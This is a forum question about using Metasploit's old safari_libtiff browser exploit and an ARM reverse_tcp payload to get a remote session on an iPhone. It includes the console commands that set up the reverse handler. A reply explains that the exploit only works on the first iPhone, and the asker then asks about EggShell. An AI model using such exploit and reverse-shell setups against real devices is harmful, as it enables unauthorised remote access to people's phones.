I have been trying to create a remote access to my Iphone using metasploit version 4.16.42 -dev
i have been using "exploit/appleios/browser/safarilibtiff"
and payload "osx/armle/execute/reverse_tcp"
I have been using my internal ip... I tried to use ngrok external ip once, then the link was successfully opened and the session was created, but the handler could not connect , and the session was also immediately closed with an error.
This is what i have been doing...
msf > use exploit/appleios/browser/safarilibtiff
msf exploit(safari_libtiff) > set URIPATH /ipwn
URIPATH => /ipwn
msf exploit(safarilibtiff) > set PAYLOAD osx/armle/execute/reversetcp
PAYLOAD => osx/armle/execute/reverse_tcp
msf exploit(safari_libtiff) > set LHOST xxx.xxx.x.xxx
LHOST => xxx.xxx.x.xxx
msf exploit(safari_libtiff) > set LPORT 4444
LPORT => 4444
msf exploit(safari_libtiff) > exploit
Started reverse handler
Using URL: 0.0.0.0:8080/ipwn
Local IP: xxxx.xxx.x.xxx:8080/ipwn
Server started.
* Exploit running as background job.
msf exploit(safari_libtiff) >
Expected behavior
when the URL is opened in the safari browser, it should create a session that i can interact with.
Current behavior
What happens instead is that the link can not be opened in the safari browser in my iphone and the session is therefore not created
System stuff
Metasploit version 4.16.42 -dev
OS
Kali Linux
2 Responses
The problem is that exploit is not what you think it is. It's a super old exploit that only works on the original iPhone, version 1. There is currently no way to get remote access to an iPhone unless you create a backdoor iOS application, jailbreak the iPhone, and then install the app. Or you get extremely lucky and find a remote code execution vulnerability that you could exploit.
Thankyou TREVELLER, I have been testing it on ios 7.1.0 . does eggshell work for remote access on ios?
Share Your Thoughts